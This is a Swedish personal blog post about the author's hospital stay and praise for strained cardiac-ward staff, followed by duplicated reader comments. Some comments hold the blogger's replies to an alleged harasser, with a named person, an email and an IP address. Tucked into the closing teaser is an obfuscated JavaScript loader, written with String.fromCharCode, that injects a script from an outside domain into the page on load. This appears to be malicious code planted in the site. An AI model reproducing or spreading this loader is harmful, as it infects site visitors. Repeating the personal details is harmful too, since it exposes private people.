Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

Inlagd på Sjukhus, lågt blodtryck och GRYM vårdpersonal!

Hej!

Först och främst… FÖRLÅT för blogg-strul. Sajten har legat nere till och från märkbart i 2 månader. Ni är många som varit snabba på att anmärka på detta… Tack!

Men igår låg den nere hela dagen. Portalen jobbar på detta och nu håller jag tummarna för att den inte strulat mer 🙏🏻

Jag ligger hemma i sängen idag. Vilar.

E8536EAA-6065-4A7C-9544-B2457BF94BC1

Jag Hamnade på sjukhus igår. Kände mig konstig hela dagen igår, matt, yrslig, och illamående. Lite skakis till och från. Ett tryck över bröstet som kom och gick. Inte samma tryck som jag kan känna igen ifrån ångest/panikångest, någonting annat… Någonting jag inte kännt tidigare. 

Det svartnade för ögonen och jag vet inte varför jag föll ihop. Men det gjorde jag.  Kom in till Danderydssjukhus, och möttes av fantastik personal.

Legat inlagd på hjärtspecialisten tills imorse.

Jag hade extremt lågt blodtryck och förmodligen var jag yrslig pga av det. Man jag hade oregelbundna hjärtslag, och märklig puls. All värden och provsvar var ändå bra. ( Man tog SÅ många blodprover) 

Röntgade både lungor och hjärta. Men ingen förklaring till varför jag mådde som jag mådde….. Dom uteslöt allt ”farligt” proppar, hjärtsäcksinflamation , alla möjliga hjärt-grejer. m.m

-Det kändes tryggt 🙏🏻❤️

 Men ändå väldigt märkligt att inte veta varför jag blev så dålig som jag blev. Riktigt läskigt, jag blev uppriktigt sagt rädd. 

Men idag känns det bättre, mycket bättre, Men  jag stannar ändå kvar i sängen och vilar.

Kommer bli kallad på återbesök och uppföljning. Men är nog på benen snart igen. 

Jag iakttog all personal på hjärta, där jag låg.

-WOW vilket team!

Alltså dom hade så sjukt mycket att göra. Dom berättade att dom hade besöks ”rekord” , att dom aldrig haft så många patienter tidigare. Folk trängdes, fick inte plats. klagade, tjafsade, var oroliga, och vissa till följd Av dom långan köerna och väntetiden blev också väldigt otrevliga.

Det var Uppenbart att dom inte hade resurser nog för att räcka till, för alla patienter. MEN sköterskorna, läkarna och alla som jobbade ansträngde sig enormt. Jag såg hur dom bemötte kritiken med ödmjukhet, välvilja och jag såg hur dom ansträngde sig maximalt för att effektivisera, hålla humöret uppe och föröka hjälpa all på bästa sätt som möjligt ❤️

-Dom var helt enkelt fantastiska! 🙌🏻

Jag följde denna avdelning i nästan 12h och känner så mycket medlidande över att se hur dom sliter och kämpar och trots stressen ändå håller humöret på topp🙌🏻

trots just dom omständigheter där man behöver fler läkare, fler sjuksköterskor och mer personal! Dom gick på knäna! Men utan att klaga, eller tappa humöret eller omtanken en enda gång!

-krigare! 

-Våran vårdpersonal behöver mer folk, mer resurser och backup ifrån våran kära politiker👊🏻

-Jag behöver nog bara vila nån dag, sen är jag på benen igen… ❤️

Skicka en omtanke eller några fina ord till våran vårdpsersonal om du vill….

Dom är värda ❤️🌟❤️🌟❤️🌟❤️🙌🏻🙏🏻

Min Jonas kom in strax innan midnatt och satt vid min sida ända fram tills imorse ❤️ Det är kärlek det….. så fin och omtänksam …

E7935066-7E55-414F-93E2-006650245B16

 Nu ska jag faktiskt sova en stund.

Ville bara kika in och säga hej och förklara varför bloggen legat nere och varför jag varit offline….. Hörs sen!

Kram kram

/My Martens 

94 Komentarer

 1. Skönt att du var under bra vård och att allt farligt uteslöts. Tror att det bästa för dig är att slippa allt folk du måste träffa på dagarna och kvällarna. Skratta och vara käck och trevlig mot alla tar hårt på en själv. Jonas , Ludvig och dina katter är dom enda levande väsen, jag rekommenderar dig att träffa på månader. Kramar ❤️

 2. Oj! Nå kanske det är det där med ” växellådan” ändå…det går inte att köra på högsta växeln hur länge som helst. Du är så enormt duktig och därför måste du få en ”farthållare” inmonterad! Vilken fin man Du har i Jonas!
  Lycka till!
  Kram till Dig och växla ner – i bland måste man bara vara!

  • Det var humoristiskt ?, ”grym” vårdpersonal kan misstolkas på samma sätt ?‍♂️
   Jag hoppas att innehållet når fram och att det är viktigare och mer betydelsefullt än en missvisande rubrik!
   En fin dag önskar jag alla?

    • Menade självklar INTE innehållet!!! Utan anmärkande på rubriken och att My’s rubrik skulle bli bättre om hon skrev ”Grym” vårdpersonal. Det stod i samma mening, så jag hoppades att det inte gick att feltolka. Tydligen gick det ändå. Allt gott!?

 3. Sjukvårdspersonal etc är verkligen vår dags vardagshjältar. Man fattar inte ens hur bra vi har det (även om mycket förstås kunde vara bättre, t.ex. dessa människors löner och arbetsförhållanden). Ta hand om dig och krya på dig!

 4. Sjukvårdspersonalen är helt fantastisk trots det arbetsklimat de har all ros till dessa människor.
  Det tempo du kör i, alla måsten och krav kan inte vara bra i längden det viktigaste är väl ändå du.

 5. Då vart jag INTE helt ute och cyklade i min kommentar i förra inlägget….Det är inte likt dig att inte vara på Instastory ens….Nu vet vi varför och det var ju INTE KUL?….Obehagligt att inte ens få en diagnos…..Tack och lov så har du din Älskade Jonas där….Ta nu väl hand om dig My!
  KryaPåDigKram ??

  • Ann ! My vet med all säkerhet vilka vitaminer som är vattenlösliga eller inte ! plus att i Sverige är rekommendationerna så låga så du kan i regel dubbla dom minst ? Kolla på doserna i USA och framförallt Tyskland som är världsledande inom hälsotillskott och dess verkningar .

   • Andrea.! Tack för din omtanke om My. Tror också att hon har full koll, men det är inte farligt att yttra några ord. I Sverige är det väldigt sällan vi har E vitaminbrist, vi får i oss det vi behöver via maten. Tar du en multivitamintablett får du en påspädning med dubbelt så mycket till varje dag. En kvinna behöver 8 milligram om dagen och med tillskott kommer du då upp i 24 milligram som lagras i kroppen.Bättre att äta de vitaminer man vet att man har brist på separat. Alla gör vi som vi vill.

 6. Så skönt att du blev ordentligt undersökt och att inget allvarligt hittades ! Nu måste du vara rädd om Lillemans mamma för han har bara en … Många kryakramar till dej My. Du är en kämpe !!

 7. Skönt att du var under bra vård och att allt farligt uteslöts. Tror att det bästa för dig är att slippa allt folk du måste träffa på dagarna och kvällarna. Skratta och vara käck och trevlig mot alla tar hårt på en själv. Jonas , Ludvig och dina katter är dom enda levande väsen, jag rekommenderar dig att träffa på månader. Kramar ❤️

 8. Skickar styrkekramar genom cybervärlden till dig fina My ❣️ ❣️ ❣️. Hoppas du får lugn och ro och börjar må bättre. Ni är ett så vackert par du och din Jonas. Kram Sara ?

 9. Oj! Nå kanske det är det där med ” växellådan” ändå…det går inte att köra på högsta växeln hur länge som helst. Du är så enormt duktig och därför måste du få en ”farthållare” inmonterad! Vilken fin man Du har i Jonas!
  Lycka till!

  Kram till Dig och växla ner – i bland måste man bara vara!

  • Det var humoristiskt 😉, ”grym” vårdpersonal kan misstolkas på samma sätt 🤸‍♂️
   Jag hoppas att innehållet når fram och att det är viktigare och mer betydelsefullt än en missvisande rubrik!
   En fin dag önskar jag alla🌸

    • Menade självklar INTE innehållet!!! Utan anmärkande på rubriken och att My’s rubrik skulle bli bättre om hon skrev ”Grym” vårdpersonal. Det stod i samma mening, så jag hoppades att det inte gick att feltolka. Tydligen gick det ändå. Allt gott!🌸

 10. Sjukvårdspersonal etc är verkligen vår dags vardagshjältar. Man fattar inte ens hur bra vi har det (även om mycket förstås kunde vara bättre, t.ex. dessa människors löner och arbetsförhållanden). Ta hand om dig och krya på dig!

 11. Tyvärr tror jag att det där visar än en gång att öven fast man älskar sitt jobb och vill jobba så säger kroppen ifrån gång på gång ända tills du själv förstår att du tyvärr inte kan jobba på som du gör. Ingen vill sluta med sina jobb som blir utbränd och sjukskriven pga ekonomi mm men man måste lyssna mer på kroppen. Det kan ta ÅR innan man återhämtat sig. Hoppas ditt team runtomkring dig hjälper dig att förstå. Krya på dig!

 12. Sjukvårdspersonalen är helt fantastisk trots det arbetsklimat de har all ros till dessa människor.
  Det tempo du kör i, alla måsten och krav kan inte vara bra i längden det viktigaste är väl ändå du.

 13. Då vart jag INTE helt ute och cyklade i min kommentar i förra inlägget….Det är inte likt dig att inte vara på Instastory ens….Nu vet vi varför och det var ju INTE KUL😔….Obehagligt att inte ens få en diagnos…..Tack och lov så har du din Älskade Jonas där….Ta nu väl hand om dig My!
  KryaPåDigKram 💗💗

 14. Först så säger jag.
  Krya på dig My.
  Sedan håller jag med dig om vårdpersonalen. Dom åka ha massor med kramar för sina insatser och behöver mer stöd och hjälp av våra politiker.
  Sänder många kramar till dig från L.

  • Ann ! My vet med all säkerhet vilka vitaminer som är vattenlösliga eller inte ! plus att i Sverige är rekommendationerna så låga så du kan i regel dubbla dom minst 🙂 Kolla på doserna i USA och framförallt Tyskland som är världsledande inom hälsotillskott och dess verkningar .

   • Andrea.! Tack för din omtanke om My. Tror också att hon har full koll, men det är inte farligt att yttra några ord. I Sverige är det väldigt sällan vi har E vitaminbrist, vi får i oss det vi behöver via maten. Tar du en multivitamintablett får du en påspädning med dubbelt så mycket till varje dag. En kvinna behöver 8 milligram om dagen och med tillskott kommer du då upp i 24 milligram som lagras i kroppen.Bättre att äta de vitaminer man vet att man har brist på separat. Alla gör vi som vi vill.

 15. Så skönt att du blev ordentligt undersökt och att inget allvarligt hittades ! Nu måste du vara rädd om Lillemans mamma för han har bara en … Många kryakramar till dej My. Du är en kämpe !!

 16. Skickar styrkekramar genom cybervärlden till dig fina My ❣️ ❣️ ❣️. Hoppas du får lugn och ro och börjar må bättre. Ni är ett så vackert par du och din Jonas. Kram Sara 💕

 17. Tyvärr tror jag att det där visar än en gång att öven fast man älskar sitt jobb och vill jobba så säger kroppen ifrån gång på gång ända tills du själv förstår att du tyvärr inte kan jobba på som du gör. Ingen vill sluta med sina jobb som blir utbränd och sjukskriven pga ekonomi mm men man måste lyssna mer på kroppen. Det kan ta ÅR innan man återhämtat sig. Hoppas ditt team runtomkring dig hjälper dig att förstå. Krya på dig!

 18. Först så säger jag.
  Krya på dig My.
  Sedan håller jag med dig om vårdpersonalen. Dom åka ha massor med kramar för sina insatser och behöver mer stöd och hjälp av våra politiker.
  Sänder många kramar till dig från L.

 19. My skriver hon ska ta det lugnt en dag.
  Hon har ofta skrivit att hon ska fokusera på sig och de sina men det går max ett dygn så kör hon på i 270 i alla fall.
  Jag undrar VAR är det team som hon har när det gäller psyket och VAD ger DE henne för råd.
  Tror att hon verkligen skulle behöva tagga ner.
  Kanske sköta sitt VD jobb som hon har måndag till fredag men därutöver kanske hon skulle ta och ”leka” familjeliv kvällstid och på helger. Vara HEMMA, laga mat, pyssla i lägenheten. Ägna sig åt sonen den tid hon har honom hos sig. Strunta i umgänge med andra, lekland, vernissager och allt vad det är.
  Lev familjeliv och ta hand om hälsan.
  My, ingen kommer tacka dig för att du totalt bränner ut dig.
  Ta det lugnt och lyssna på kroppen och knoppen.
  Vi behöver inte veta allt, som jag skrivit tidigare och vi behöver inte uppdateras dagligen ( ibland flera gånger om dan).
  Du behöver inte skriva att du ska logga ut ett tag, gör det bara.
  Ägna dig sparsamt åt medierna och ta hand om dig!
  Kramar ?

 20. My skriver hon ska ta det lugnt en dag.
  Hon har ofta skrivit att hon ska fokusera på sig och de sina men det går max ett dygn så kör hon på i 270 i alla fall.
  Jag undrar VAR är det team som hon har när det gäller psyket och VAD ger DE henne för råd.
  Tror att hon verkligen skulle behöva tagga ner.
  Kanske sköta sitt VD jobb som hon har måndag till fredag men därutöver kanske hon skulle ta och ”leka” familjeliv kvällstid och på helger. Vara HEMMA, laga mat, pyssla i lägenheten. Ägna sig åt sonen den tid hon har honom hos sig. Strunta i umgänge med andra, lekland, vernissager och allt vad det är.
  Lev familjeliv och ta hand om hälsan.
  My, ingen kommer tacka dig för att du totalt bränner ut dig.
  Ta det lugnt och lyssna på kroppen och knoppen.
  Vi behöver inte veta allt, som jag skrivit tidigare och vi behöver inte uppdateras dagligen ( ibland flera gånger om dan).
  Du behöver inte skriva att du ska logga ut ett tag, gör det bara.
  Ägna dig sparsamt åt medierna och ta hand om dig!
  Kramar 💕

 21. Har tidigare arbetat inom vården så det känns jättefint att du lyfter upp deras arbete, det är en ständig kamp mot klockan och ofta usla arbetsförhållanden men viljan att hjälpa. Även skönt att du känner dig väl omhändertaget och trygg. Ta allt i din takt och vad skönt att Jonas är hemma och inte ute och spelar så att han kan finnas för dig. Många krya på dig kramar och hoppas du får upp blodtrycket, är väl det som är det svåraste kan jag tänka att få stadigt och jämnt.

 22. Har tidigare arbetat inom vården så det känns jättefint att du lyfter upp deras arbete, det är en ständig kamp mot klockan och ofta usla arbetsförhållanden men viljan att hjälpa. Även skönt att du känner dig väl omhändertaget och trygg. Ta allt i din takt och vad skönt att Jonas är hemma och inte ute och spelar så att han kan finnas för dig. Många krya på dig kramar och hoppas du får upp blodtrycket, är väl det som är det svåraste kan jag tänka att få stadigt och jämnt.

 23. Lite svårt att inte ” ägna sig åt medierna ” när det är där man har sin inkomst …verkar inte som alla förstår att när vi ” vanliga ” går till jobbet och får lön , så bloggar de här o gör reklam och får betalt ..

  • Hon behöver väl inte blogga och insta HELA tiden. De reklaminlägg hon gör kan hon göra ändå utan att fördenskull behöva dela med sig av SITT hela tiden.
   Hon HAR ju ett jobb nu. ( det är ju så de flesta får sin försörjning) a

 24. Håller med.Lägg ner bloggen. Fokusera på det riktiga livet. Barn och pojkvän. Jobba med ditt ”VD” jobb, njut med vänner av mat och roliga dagar med din son. Allt behöver i te dokumenteras, ingen bryr sig. De som verkligen bryr sig har säkert dig i sin sms lista o dom i din. Det som räknas är inte det du visar upp här. Det kommer bara bli en stress att försöka leva upp till det du försöker förmedla. Nej njut av de små sakerna i livet så kommer du nog snart må bättre !
  Krya på dig !!!

 25. Lite svårt att inte ” ägna sig åt medierna ” när det är där man har sin inkomst …verkar inte som alla förstår att när vi ” vanliga ” går till jobbet och får lön , så bloggar de här o gör reklam och får betalt ..

  • Hon behöver väl inte blogga och insta HELA tiden. De reklaminlägg hon gör kan hon göra ändå utan att fördenskull behöva dela med sig av SITT hela tiden.
   Hon HAR ju ett jobb nu. ( det är ju så de flesta får sin försörjning) a

 26. Håller med.Lägg ner bloggen. Fokusera på det riktiga livet. Barn och pojkvän. Jobba med ditt ”VD” jobb, njut med vänner av mat och roliga dagar med din son. Allt behöver i te dokumenteras, ingen bryr sig. De som verkligen bryr sig har säkert dig i sin sms lista o dom i din. Det som räknas är inte det du visar upp här. Det kommer bara bli en stress att försöka leva upp till det du försöker förmedla. Nej njut av de små sakerna i livet så kommer du nog snart må bättre !
  Krya på dig !!!

 27. Hoppas du mår bättre My!
  Pausa bloggen, även om det är ett av dina levebröd. Hela din kropp skriker ”pausa”. Så många tecken på att du ska ta det varligt. Vi som gillar din blogg, lär finnas kvar…Kram

 28. Hoppas du mår bättre My!
  Pausa bloggen, även om det är ett av dina levebröd. Hela din kropp skriker ”pausa”. Så många tecken på att du ska ta det varligt. Vi som gillar din blogg, lär finnas kvar…Kram

 29. Har inte märkt att din blogg legat nere. Är det nån som kräver att du ska blogga varje dag ? Läser många bloggar och i stort sett ingen skriver varje dag.
  Lågt blodtryck i samband med stress och härj resulterar ofta med dom symptom du fick . TA DET LUGNT EN TID så blir du bättre.

 30. Har inte märkt att din blogg legat nere. Är det nån som kräver att du ska blogga varje dag ? Läser många bloggar och i stort sett ingen skriver varje dag.
  Lågt blodtryck i samband med stress och härj resulterar ofta med dom symptom du fick . TA DET LUGNT EN TID så blir du bättre.

 31. Hon kan inte ta det lugnt. Hon är rädd att tappa sin identitet, som hon TROR hon har men tyvärr har hon ingen koll på vare sig den eller sitt sätt att vara. Det ska vara drama och bitterhet som hon sedan alltid kan falla tillbaka till o hänvisa o ’förklara’. Mytomaner o även psykopater, bipolära mfl fungerar precis som My. Praktexempel!!

  • My
   blogg.alltforforaldrar.se/mammamy
   mymartens@gmail.com
   94.234.42.50
   Postat 2018-09-12 kl. 20:25 | Som svar till Lotta Looser.
   Hej Kia! (Väljer att bara skriva ditt förnamn här) för att vara sjysst mot dig.
   Allt bra i Bromma? Hur går det med ”Alexander Berggren”? Din påhittade låtsas relation? Som du själv skriver ifrån? Jag Hr blockerat er båda. Försökt att hålla avstånd. Men jag förstod inte att ”han” var du själv…. förrän några månader sedan.
   Se nu inte detta som ett hot! Detta är ett löfte! Det handlar inte om DENNA kommentaren utan om ÅR av trakasserier från din sida, mot mig! Trakasserier, kränkning, förtal och hot!
   Du har trakasserat mig sedan 2013!!
   ALLT finns dokumenterar. Sparat, Jag känner till ditt tidigare besöksförbud för annan trakassering. Jag vet vart du jobbat, och vart du bor.
   Jag vill dig inget illa!
   Men detta är min absolut sista varning! Lämna mig ifred! På riktigt denna gång! En gång till och jag kommer anmäla dig, (igen) med den kännedom som jag tidigare saknat, dvs vem du ÄR. Jag kommer prata med din arbetsgivare, visa vad du skriver och tidigare anmälningar och förklara varför jag inte vågar använda mig av bolaget du jobbar på.
   Förstår du det? -Backa från mig! Lämna mig, och min familj ifred! Di projicerar ditt egna liv på mig, dina egna val, din egna separation, ditt egna barn. Men det räcker nu! Låt mig/oss vara??
   Fokusera på dig själv och det som får dig att må bra! Att trakassera någon annan får inte dig själv att må bättre….

  • Men ”KW”
   Är du tillbaka? Trots dina löften om att inte störa/besvära mig mer? Är det du som ligger bakom alla hot och handskrivna brev, för att du tror att vi inte kan spåra det?
   Vi har ju med hjälp av trollljägarna spårat dig… ska du skylla på din ”inneboende släkting” igen? Smsa långa sms och förklara och be om ursäkt?
   Ska jag behöva gå hela vägen med polisanmälningar, kontakta din arbetsgivare, och ansöka om besöksförbud och beskydd från dina trakasserier?
   Nu har du hållt på sedan 2013. Det räcker nu! Detta är inget hot, detta är ett löfte! Min gräns är nådd…..

 32. Hon kan inte ta det lugnt. Hon är rädd att tappa sin identitet, som hon TROR hon har men tyvärr har hon ingen koll på vare sig den eller sitt sätt att vara. Det ska vara drama och bitterhet som hon sedan alltid kan falla tillbaka till o hänvisa o ’förklara’. Mytomaner o även psykopater, bipolära mfl fungerar precis som My. Praktexempel!!

  • My
   blogg.alltforforaldrar.se/mammamy
   mymartens@gmail.com
   94.234.42.50
   Postat 2018-09-12 kl. 20:25 | Som svar till Lotta Looser.
   Hej Kia! (Väljer att bara skriva ditt förnamn här) för att vara sjysst mot dig.

   Allt bra i Bromma? Hur går det med ”Alexander Berggren”? Din påhittade låtsas relation? Som du själv skriver ifrån? Jag Hr blockerat er båda. Försökt att hålla avstånd. Men jag förstod inte att ”han” var du själv…. förrän några månader sedan.

   Se nu inte detta som ett hot! Detta är ett löfte! Det handlar inte om DENNA kommentaren utan om ÅR av trakasserier från din sida, mot mig! Trakasserier, kränkning, förtal och hot!

   Du har trakasserat mig sedan 2013!!
   ALLT finns dokumenterar. Sparat, Jag känner till ditt tidigare besöksförbud för annan trakassering. Jag vet vart du jobbat, och vart du bor.

   Jag vill dig inget illa!

   Men detta är min absolut sista varning! Lämna mig ifred! På riktigt denna gång! En gång till och jag kommer anmäla dig, (igen) med den kännedom som jag tidigare saknat, dvs vem du ÄR. Jag kommer prata med din arbetsgivare, visa vad du skriver och tidigare anmälningar och förklara varför jag inte vågar använda mig av bolaget du jobbar på.
   Förstår du det? -Backa från mig! Lämna mig, och min familj ifred! Di projicerar ditt egna liv på mig, dina egna val, din egna separation, ditt egna barn. Men det räcker nu! Låt mig/oss vara🙏🏻

   Fokusera på dig själv och det som får dig att må bra! Att trakassera någon annan får inte dig själv att må bättre….

  • Men ”KW”

   Är du tillbaka? Trots dina löften om att inte störa/besvära mig mer? Är det du som ligger bakom alla hot och handskrivna brev, för att du tror att vi inte kan spåra det?

   Vi har ju med hjälp av trollljägarna spårat dig… ska du skylla på din ”inneboende släkting” igen? Smsa långa sms och förklara och be om ursäkt?

   Ska jag behöva gå hela vägen med polisanmälningar, kontakta din arbetsgivare, och ansöka om besöksförbud och beskydd från dina trakasserier?

   Nu har du hållt på sedan 2013. Det räcker nu! Detta är inget hot, detta är ett löfte! Min gräns är nådd…..

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/